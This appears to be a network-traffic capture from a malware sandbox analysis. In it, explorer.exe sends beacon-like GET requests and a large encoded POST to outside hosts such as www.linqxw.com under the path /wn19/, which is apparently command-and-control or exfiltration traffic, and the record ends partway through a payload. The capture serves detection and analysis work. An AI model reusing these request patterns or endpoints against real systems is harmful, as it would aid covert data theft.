8d 50 09 4b f0 27 70 eb fb a9 4d 2f 90 11 0e 11 7d 8d ad 32 3f 2d 67 42 26 33 b1 46 ee 03 1f 2c 80 5e b3 a4 a6 14 d3 66 7a 50 ee 59 3b 21 d9 6b f3 8c 9a b9 db f0 69 96 d7 47 5f 31 d0 74 ef 6d 2b 73 8a 4b bd 5c 8d f4 0b 4b d3 9f 6a 3d 3d 64 50 07 10 ad 88 9f fc fb c4 9a f8 b4 5d 53 81 5c 91 3c 6e 91 6d b3 35 10 2c b8 b2 0a 70 7e 0b 3d 79 fd d4 05 c8 44 05 94 89 8b ef 3c 40 d7 b5 75 6a f3 78 3e 7c d7 8c 1e db 20 eb a0 a3 03 c3 06 aa 2b 95 65 d0 fe f0 a3 78 4d 4d 13 4d 36 46 9c 3f 0c 24 43 75 83 76 60 21 2d bf e8 79 fc 89 7a 25 c2 ec ea a0 d1 15 a4 a0 24 95 bf 8a 9b b1 1c ea 5b e9 f4 4a 95 44 38 67 f9 6c 25 93 b6 43 56 08 17 7a 94 cd 97 e7 0f ac 5b f9 64 d0 74 47 02 fa 68 9b 5c 3c 21 11 63 15 08 43 49 4f fb 5a 02 a7 82 f7 f0 31 94 3a d7 ef d0 1e 5b 0c 46 d7 74 b6 a1 3a f1 65 45 99 12 37 1e b6 9e 86 de d6 ab b8 b4 26 91 8e 6b 82 a4 8e 44 ba 63 ff 69 db 0d 0a 09 64 ec 35 5d f3 97 81 34 1b f0 a1 2a 18 b5 af b3 bc 7f 90 ac c9 a9 80 97 42 f4 b0 bb fa 54 0a 6e fe ae 8a 02 9d 4e c4 14 88 d4 ec 55 05 8e 0c 8e 4e 88 a4 d3 15 b2 8c 60 91 6b d0 da 14 fe 26 20 13 62 8c ca 7a a0 c0 fa 24 36 6e Data Ascii: _\|G\|q>)Y=,9"~)6&AjeN6#%R++)Il%CVz[dtGh\<!CGPAT:vv2fHesYpH#n5]4[]"Z2pFvCGZ$Yr1 `}](k& bz$f+CpmCTp{f(Txn>o]lNduEWQdub4,Q&@"T/^Eth2ipZ!q1:B>X[@zDjn;t6eo+rrlfL+^K%6,$C6lj Fj5\|:sov~q~4yRBZvda0zM^'rvrEN~}'d`9"f>Vei_dsv89p}pIBedW<(rhRx6z Xo+U&_.phvkny2\_N_<;G<-\|Pc&sO9\|_4`>PK'pM/}2?-gB&3F,^fzPY;!kiG_1tm+sK\Kj==dP]S\<nm5,p~=yD<@ujx>\| +exMMM6F?$Cuv`!-yz%$[JD8gl%CVz[dtGh\<!cCIOZ1:[Ft:eE7&kDcid5]4*BTnNUN`k& bz$6n
May 10, 2022 14:22:49.895107031 CEST	9166	IN	Data Raw: a0 43 3c 1c 6c 43 a1 11 1a ac 54 05 70 7b 07 8e cd 11 43 9a fe 80 6d 29 0a 2a c0 62 56 e0 1a ad a5 c5 ee 78 b9 6e 82 cf 6e ae a4 4d cd 6c 1f 2a d4 d3 4e 98 a0 19 92 74 9d a3 b2 c0 d0 8a 1c e9 9a 75 45 02 e4 90 52 51 65 75 62 9d 34 95 8f dc a6 13 Data Ascii: C<lCTp{Cm)bVxnnMlNtuERQeub4Q&NP"D/NEth*"ipZ!q1:B>X[@zDjn;t6eo+rrlfL+^K%6,$C6lj Fj5\|:sov~q~
May 10, 2022 14:22:49.895168066 CEST	9168	IN	Data Raw: f3 8a f4 8d 50 09 4b f0 27 70 eb fb a9 4d 2f 90 11 0e 11 7d 8d ad 32 3f 2d 67 42 26 33 b1 46 ee 03 1f 2c 80 5e b3 a4 a6 14 d3 66 7a 50 ee 59 3b 21 d9 6b f3 8c 9a b9 db f0 69 96 d7 47 5f 31 d0 74 ef 6d 2b 73 8a 4b bd 5c 8d f4 0b 4b d3 9f 6a 3d 3d Data Ascii: PK'pM/}2?-gB&3F,^fzPY;!kiG_1tm+sK\Kj==dP]S\<nm5,p~=yD<@ujx>\| +exMMM6F?$Cuv`!-yz%$[JD8gl%CVz[dtGh\<!cCIOZ
May 10, 2022 14:22:49.895227909 CEST	9169	IN	Data Raw: 70 04 5a 21 ca 95 71 31 3a b2 07 1f 84 1a 98 82 42 3e 1a 1c ae 58 5b 04 40 7a 44 6a 6e 15 9a e1 1b 3b 74 36 b6 65 6f 2b ad 86 e8 a9 bb 72 c0 dc 72 6c fb b9 66 f2 4c 2b df 1a 84 1e 92 5e 4b 25 d6 d3 36 9e d7 a8 99 ff 2c 24 43 07 90 c8 06 aa 8c 86 Data Ascii: pZ!q1:B>X[@zDjn;t6eo+rrlfL+^K%6,$C6lj Fj5\|:sov~q~4\|&BXvd$a0zM~'vrEN~}'d`9"f>Vei_dsv89p}p
May 10, 2022 14:22:49.895288944 CEST	9170	IN	Data Raw: 5e 8e 85 54 2e 5b 8a c6 fb b7 b1 a3 9a fe 27 ff f5 6b a0 85 07 4b d3 ad ae 4c f3 52 91 ee 83 09 95 65 53 3a e0 90 b8 c8 bb 67 5c 1d 99 16 73 09 f8 71 7a c3 fe 6c 1a 6a 84 2e 0b 0d d7 25 7e 49 09 b7 63 dd 1c f4 91 38 30 e3 3a ce 3a f0 69 b7 f9 a7 Data Ascii: ^T.['kKLReS:g\sqzlj.%~Ic80::ida5Z}3eFXt-WLr\|nWO[]\|lWYSBlx:IqI[}&iBNkq\dpxF$Qz_rUw%Y}CrPbv`;L^rY!E
May 10, 2022 14:22:49.895350933 CEST	9172	IN	Data Raw: f9 8d 0b a9 dc fb 91 85 35 50 88 df 2e b1 db 08 c2 b9 52 2f 6a e6 7f 89 b1 19 5d 2a 9b db 0f 29 41 b8 a6 b5 96 59 f6 2f 08 6d 38 7d 2b 77 7b 74 81 d8 cd 1b 9b cf 74 f3 86 be b1 4f 83 57 53 ed b9 f8 46 16 f8 5f a3 e3 0b d0 a3 86 24 fe 6b 43 4e f9 Data Ascii: 5P.R/j])AY/m8}+w{ttOWSF_$kCN49}SRHHaEYW?5[8z[0O&\Fy(Esy:[Bf-2e<.vX#=zqCs?@bL)e{C-%q$`hssOc$LT
May 10, 2022 14:22:49.895411968 CEST	9173	IN	Data Raw: 9c ea 80 3b 31 bf 3c df fa 5a 7d 08 9f 14 b1 70 10 6a 2c e3 a4 f3 34 f9 5a ea 66 bf f1 9b ba 66 36 2b 02 8e 59 03 da 28 54 47 45 80 37 d9 ac 07 ac 70 bb 45 a4 4b dd a8 ca 8f 05 9a 13 ca 0c 35 51 16 f3 9e e0 5f d5 e7 96 47 5b 77 b8 15 b8 37 56 7f Data Ascii: ;1<Z}pj,4Zff6+Y(TGE7pEK5Q_G[w7V)\|L2vuAv+t2IZ,o+U>+N@^&7p2`>?$b@FFzc~(Tgb\jlQWcjPH}HoC(gl%i{2
May 10, 2022 14:22:49.895472050 CEST	9174	IN	Data Raw: ab c0 c6 8f 1a 11 db b4 1e 32 59 ba 0e 9a 89 88 4a 8a 90 b9 ad 87 73 09 53 7d 81 1c 78 45 fa 90 7f 08 bf b3 f2 80 f1 ff cd 16 df a7 f4 84 28 06 c0 04 e0 d3 fd aa 1f b3 00 94 61 4c 0a 88 3d 62 c2 76 cc 48 b1 5c 43 96 86 cd 5a 8f 2e d9 3d 13 b2 4b Data Ascii: 2YJsS}xE(aL=bvH\CZ.=K)9'i-QsvI[s>q$*!MFm<Yy4;NSK[Y0(ck&1L~^i(qYj1u<#3++`p`sOs;yn5t\|G
May 10, 2022 14:22:49.895531893 CEST	9176	IN	Data Raw: 17 5f 30 04 d9 df e4 b8 60 8b bd 25 e8 00 db c9 60 f0 8e 43 db e9 6f 5b ee e5 83 a2 94 67 bc 82 be 37 ee bc 17 28 cd 1b ee 8f 1e 3a 9d a9 ad aa 42 e6 02 6b 40 43 91 7d 9b 23 04 68 8a 48 50 e5 d5 2b 0c 4a 0e 44 de 17 34 67 5c 4d 23 65 5b 82 2e 1f Data Ascii: _0`%`Co[g7(:Bk@C}#hHP+JD4g\M#e[.1;)jpd?NpMoYSl@2)]A1?)UMofH[yzQ'eIqRyYFuFmDIRfV(0WM~PsyF^WzzyV3__`sDH2u
May 10, 2022 14:22:49.895595074 CEST	9177	IN	Data Raw: 39 77 a1 68 4e d3 eb c8 0e 88 cd e9 2f 2f ff 7d f5 72 6d f4 72 50 f6 8a 36 2f f1 0d 04 a9 b2 2f 9b ef 87 6b 71 06 dc 22 b4 d3 a6 8d 2e b2 56 46 11 03 e0 ed 46 56 32 42 59 14 2c 66 71 ae 67 23 2b aa a8 7f 78 72 5b 76 d3 71 8e 96 28 47 a0 f0 16 7c Data Ascii: 9whN//}rmrP6//kq".VFFV2BY,fqg#+xr[vq(G\|nsuKXw:yRS~\u8\|Isx=+Luv<K&4~y>\|^HsN{`BS2O?SL1^yiLkA[__4]ZKkJlVr0VCx/tG
May 10, 2022 14:22:50.099534988 CEST	9179	IN	Data Raw: f8 38 e2 d0 4e 45 05 46 b8 ec 6c eb dd 8e 11 9a 4e 2d f8 9b da d2 14 92 ce 3a b2 07 2c f0 82 9c 09 1f ce 29 6d ba d1 26 fc 81 85 54 eb 89 ea 9a e1 1b b0 08 8e b2 a4 94 23 6c 49 e0 28 58 8d c0 dc 72 e7 a7 21 62 33 87 3b ec e1 0f 43 6e df a8 da d6 Data Ascii: 8NEFlN-:,)m&T#lI(Xr!b3;Cn60>,pkwI^6_8=klMlp\|6>'q~$J%+{Jd$IKr[hslp~'!ee}+ F0*0'[9xoh2"Uo^ivT}_dK

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49768	217.160.0.18	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 10, 2022 14:25:21.460128069 CEST	9365	OUT	GET /wn19/?AVnXAh=A9tPw5wW+2gVzhiAst2uEYMxl8Qbhtbs4UZqv+cXLFe4/YHx2PgN7R7cqpKWqQ64E5aF&Vb3pDf=BHT0MRp HTTP/1.1 Host: www.borneadomicile.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 10, 2022 14:25:21.478069067 CEST	9366	IN	HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 837 Connection: close Date: Tue, 10 May 2022 12:25:21 GMT Server: Apache Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 4c 65 20 66 69 63 68 69 65 72 20 72 65 71 75 69 73 20 6e 27 61 20 70 61 73 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 74 72 6f 75 76 26 65 61 63 75 74 65 3b 2e 0a 49 6c 20 70 65 75 74 20 73 27 61 67 69 72 20 64 27 75 6e 65 20 65 72 72 65 75 72 20 74 65 63 68 6e 69 71 75 65 2e 20 56 65 75 69 6c 6c 65 7a 20 72 26 65 61 63 75 74 65 3b 65 73 73 61 79 65 72 20 75 6c 74 26 65 61 63 75 74 65 3b 72 69 65 75 72 65 6d 65 6e 74 2e 20 53 69 20 76 6f 75 73 20 6e 65 20 70 6f 75 76 65 7a 20 70 61 73 20 61 63 63 26 65 61 63 75 74 65 3b 64 65 72 20 61 75 20 66 69 63 68 69 65 72 20 61 70 72 26 65 67 72 61 76 65 3b 73 20 70 6c 75 73 69 65 75 72 73 20 74 65 6e 74 61 74 69 76 65 73 2c 20 63 65 6c 61 20 73 69 67 6e 69 66 69 65 20 71 75 27 69 6c 20 61 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 73 75 70 70 72 69 6d 26 65 61 63 75 74 65 3b 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Le fichier requis n'a pas été trouvé.Il peut s'agir d'une erreur technique. Veuillez réessayer ultérieurement. Si vous ne pouvez pas accéder au fichier après plusieurs tentatives, cela signifie qu'il a été supprimé. </p> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.11.20	49784	209.99.40.222	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 10, 2022 14:29:09.169404030 CEST	10487	OUT	GET /wn19/?AVnXAh=041CpAoA8aE4nytHYFLnZX+bZp2z2B9kFJxelKlpXP3rI73HFbKkzWSC2hacigUxO+LM&Vb3pDf=BHT0MRp HTTP/1.1 Host: www.linqxw.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 10, 2022 14:29:09.460515022 CEST	10489	IN	HTTP/1.1 200 OK Date: Tue, 10 May 2022 12:29:09 GMT Server: Apache Set-Cookie: vsid=919vr3997313492610828; expires=Sun, 09-May-2027 12:29:09 GMT; Max-Age=157680000; path=/; domain=www.linqxw.com; HttpOnly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_iGyK23qWCi9ySWncGuz32s+CTVOicqxUJIXB3qxkKwsIm2IERdtH4Uz1V9WP5MOmf0siF+Q5rJMcB66cjaG5JQ== Keep-Alive: timeout=5, max=123 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 35 38 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 6e 71 78 77 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 6e 71 78 77 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 66 75 6e 63 74 69 6f 6e 20 68 61 6e 64 6c 65 41 42 50 44 65 74 65 63 74 28 29 7b 74 72 79 7b 69 66 28 21 61 62 70 29 20 72 65 74 75 72 6e 3b 76 61 72 20 69 6d 67 6c 6f 67 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6d 67 22 29 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 6e 71 78 77 2e 63 6f 6d 2f 73 6b 2d 6c 6f 67 61 62 70 73 74 61 74 75 73 2e 70 68 70 3f 61 3d 65 6e 64 6a 4d 6d 52 6d 51 32 4a 73 4e 47 78 6b 55 30 67 78 62 6b 46 4a 55 56 56 79 56 6c 52 78 5a 31 63 33 5a 6e 68 48 54 47 46 47 64 46 4e 49 4f 46 64 70 53 6a 52 52 4d 56 4e 6d 57 47 63 78 4f 54 52 6e 4c 32 35 47 52 6b 46 49 4d 6b 74 4c 59 6b 46 61 59 54 68 6d 4e 6d 35 70 4d 32 45 31 59 56 4a 7a 4b 7a 4a 4c 51 55 31 34 64 6a 4a 34 53 47 67 76 51 32 39 72 65 55 68 79 59 6b 49 32 64 55 38 32 52 6d 68 7a 64 6a 55 30 57 57 74 31 65 56 6c 34 57 45 64 7a 59 31 68 69 56 55 70 33 62 47 4a 6d 62 33 56 4d 4f 45 59 3d 26 62 3d 22 2b 61 62 70 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 69 6d 67 6c 6f 67 29 3b Data Ascii: 5890<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.linqxw.com/px.js?ch=1"></script><script type="text/javascript" src="http://www.linqxw.com/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";imglog.style.width="0px";imglog.src="http://www.linqxw.com/sk-logabpstatus.php?a=endjMmRmQ2JsNGxkU0gxbkFJUVVyVlRxZ1c3ZnhHTGFGdFNIOFdpSjRRMVNmWGcxOTRnL25GRkFIMktLYkFaYThmNm5pM2E1YVJzKzJLQU14djJ4SGgvQ29reUhyYkI2dU82RmhzdjU0WWt1eVl4WEdzY1hiVUp3bGJmb3VMOEY=&b="+abp;document.body.appendChild(imglog);
May 10, 2022 14:29:09.460592985 CEST	10490	IN	Data Raw: 69 66 28 74 79 70 65 6f 66 20 61 62 70 65 72 75 72 6c 20 21 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 20 26 26 20 61 62 70 65 72 75 72 6c 21 3d 22 22 29 77 69 6e 64 6f 77 2e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 3d 61 62 70 65 72 75 72 6c 3b 7d 63 Data Ascii: if(typeof abperurl !== "undefined" && abperurl!="")window.top.location=abperurl;}catch(err){}}</script><meta name="tids" content="a='12471' b='14601' c='linqxw.com' d='entity_mapped'" /><title>Linqxw.com</title><meta http-equiv="Content-Type
May 10, 2022 14:29:09.460649014 CEST	10491	IN	Data Raw: 29 2c 75 72 6c 28 22 68 74 74 70 3a 2f 2f 69 33 2e 63 64 6e 2d 69 6d 61 67 65 2e 63 6f 6d 2f 5f 5f 6d 65 64 69 61 5f 5f 2f 66 6f 6e 74 73 2f 75 62 75 6e 74 75 2d 62 2f 75 62 75 6e 74 75 2d 62 2e 77 6f 66 66 22 29 20 66 6f 72 6d 61 74 28 22 77 6f Data Ascii: ),url("http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff") format("woff"),url("http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2") format("woff2"),url("http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf")
May 10, 2022 14:29:09.460700989 CEST	10493	IN	Data Raw: 6f 6d 3a 20 31 35 70 78 7d 0d 0a 2e 70 6f 70 75 6c 61 72 2d 73 65 61 72 63 68 65 73 7b 70 61 64 64 69 6e 67 3a 20 34 30 70 78 20 32 35 70 78 20 35 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 68 74 74 70 3a 2f 2f 69 33 2e 63 64 6e 2d Data Ascii: om: 15px}.popular-searches{padding: 40px 25px 5px;background: url(http://i3.cdn-image.com/__media__/pics/12471/kwbg.jpg) no-repeat center center;background-size: cover}.popular-searches ul.first{ list-style: none;width: 380px;margin:0 aut
May 10, 2022 14:29:09.460753918 CEST	10494	IN	Data Raw: 6f 61 74 3a 20 6c 65 66 74 3b 6d 61 78 2d 77 69 64 74 68 3a 20 35 30 25 3b 7d 0d 0a 2e 77 65 62 73 69 74 65 20 61 7b 77 6f 72 64 2d 77 72 61 70 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 63 6f 6c 6f 72 Data Ascii: oat: left;max-width: 50%;}.website a{word-wrap: break-word;font-size: 24px;color: #ffffff;font-family: Arial, Helvetica, sans-serif; display:block;background:url(http://i3.cdn-image.com/__media__/pics/12471/logo.png) no-repeat left center; f
May 10, 2022 14:29:09.460808039 CEST	10495	IN	Data Raw: 20 32 37 35 70 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 Data Ascii: 275px;-webkit-border-radius:0;-moz-border-radius:0;border-radius:0;color: #ffffff}.srchBtn {background: #22528a url(http://i3.cdn-image.com/__media__/pics/12471/search-icon.png) no-repeat center center; border: none; color: #fff; cursor:
May 10, 2022 14:29:09.460863113 CEST	10497	IN	Data Raw: 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 39 39 30 70 78 29 20 7b 0d 0a 2e 70 6f 70 75 6c 61 72 2d 73 65 61 72 63 68 65 73 20 6c 69 20 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 7d 0d 0a Data Ascii: dia only screen and (max-width:990px) {.popular-searches li a{font-size: 18px}.footer-related a{font-size: 17px !important}.main-container{width: 90%!important;padding-bottom: 30px}.popular-searches li {margin-bottom: 0px;margin-top: 1
May 10, 2022 14:29:09.460917950 CEST	10498	IN	Data Raw: 69 64 74 68 3a 20 39 35 25 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 7d 0d 0a 20 20 20 20 2e 70 72 69 76 61 63 79 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 35 70 78 7d 0d 0a 20 20 20 20 75 6c 2e 70 72 69 76 61 Data Ascii: idth: 95% !important; margin: 0 auto} .privacy{margin-top:15px} ul.privacy{text-align: center;}}@media only screen and (max-width:480px) { div.search-form{width: 250px} .website{max-width: 95%;} .srchTxt{width:
May 10, 2022 14:29:09.460971117 CEST	10500	IN	Data Raw: 6b 2d 77 6f 72 64 3b 7d 0d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a Data Ascii: k-word;} </style><![endif]--><script language="JavaScript" type="text/javascript" src="http://i3.cdn-image.com/__media__/js/min.js?v2.3"></script></head><body onload="" onunload="" onBeforeUnload=""><div style="visibility:hidd
May 10, 2022 14:29:09.461025000 CEST	10501	IN	Data Raw: 69 6e 70 75 74 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 73 72 63 68 42 74 6e 22 20 76 61 6c 75 65 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 Data Ascii: input type="submit" class="srchBtn" value="" /> <input type="hidden" name="gsp" value="VU5qbHU1cXl2MUpMaWsxR3FMdktsRVBPc3dUT1pXTUJ4eUVYSHd0R3RPbFlPemhyOTA0VUg0UzR5UDI4bXZhRG1yWU9Rc2FOSlJ6dHdFTkZBT1BzRWF5TUR4c2UvUjd0WU9Jbkh
May 10, 2022 14:29:09.548854113 CEST	10502	IN	Data Raw: 6c 52 54 39 50 43 5a 49 65 6d 47 4d 57 75 41 42 4c 66 51 70 25 32 46 37 4b 59 49 33 26 6b 62 65 74 75 3d 31 26 6d 61 78 61 64 73 3d 30 26 6b 6c 64 3d 31 30 36 31 26 70 72 76 74 6f 66 3d 50 6a 4c 36 53 47 63 31 42 41 54 68 6b 58 73 55 53 49 63 64 Data Ascii: lRT9PCZIemGMWuABLfQp%2F7KYI3&kbetu=1&maxads=0&kld=1061&prvtof=PjL6SGc1BAThkXsUSIcdEVZf%2FZvbbe%2FrrhLYCWt9xl4%3D&AVnXAh=041CpAoA8aE4nytHYFLnZX+bZp2z2B9kFJxelKlpXP3rI73HFbKkzWSC2hacigUxO+LM&Vb3pDf=BHT0MRp&&kt=112&&ki=795812&ktd=0&kld=1061&kp=1"

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.11.20	49785	209.99.40.222	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 10, 2022 14:29:11.751184940 CEST	10520	OUT	POST /wn19/ HTTP/1.1 Host: www.linqxw.com Connection: close Content-Length: 227520 Cache-Control: no-cache Origin: http://www.linqxw.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.linqxw.com/wn19/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 41 56 6e 58 41 68 3d 38 61 35 34 33 67 42 79 39 39 51 4a 79 51 31 46 47 51 65 4d 59 43 75 31 65 37 75 4f 28 51 4e 46 52 5a 73 32 7e 61 51 77 52 63 71 78 4f 76 76 32 4b 4c 62 38 77 79 62 5f 6c 77 7e 58 69 6c 77 4b 41 66 62 6d 50 68 36 6f 45 32 56 50 4d 66 65 7a 61 30 43 47 79 6e 70 32 28 57 79 74 7a 6c 4c 44 6b 37 45 70 61 38 65 4c 72 77 4f 38 68 67 41 66 77 4a 45 52 58 51 78 44 77 46 72 46 50 33 57 75 43 56 42 54 61 74 4e 38 4c 4f 33 67 62 57 69 64 33 74 76 33 63 75 7e 66 5a 48 55 65 58 30 5a 46 6d 47 66 66 39 54 53 72 48 61 74 57 72 66 4d 69 5a 70 67 64 6e 54 4e 68 78 74 58 2d 36 4e 6c 42 70 6f 76 52 6f 2d 4d 73 79 32 75 52 66 6c 6c 53 46 54 77 54 58 75 5a 36 32 66 43 2d 64 4f 7e 71 59 61 6f 42 33 68 39 71 6a 76 4c 75 43 64 76 50 48 48 35 52 37 54 52 50 58 76 47 65 54 44 77 52 72 44 6e 57 75 36 36 5a 4b 7a 33 58 4d 5a 76 49 64 46 4d 4c 43 2d 76 57 58 54 4f 45 71 6f 63 56 79 76 34 6b 31 6f 72 39 54 7a 4d 35 37 49 72 31 4b 65 67 30 48 4f 38 35 56 50 6e 41 71 4b 36 6c 33 4c 33 6e 30 37 28 79 56 79 28 69 64 4e 6e 6a 72 4b 76 77 56 4e 30 48 47 4d 59 45 78 77 70 68 72 74 53 54 72 71 67 49 68 35 64 57 4b 47 70 41 33 54 70 76 6f 45 47 73 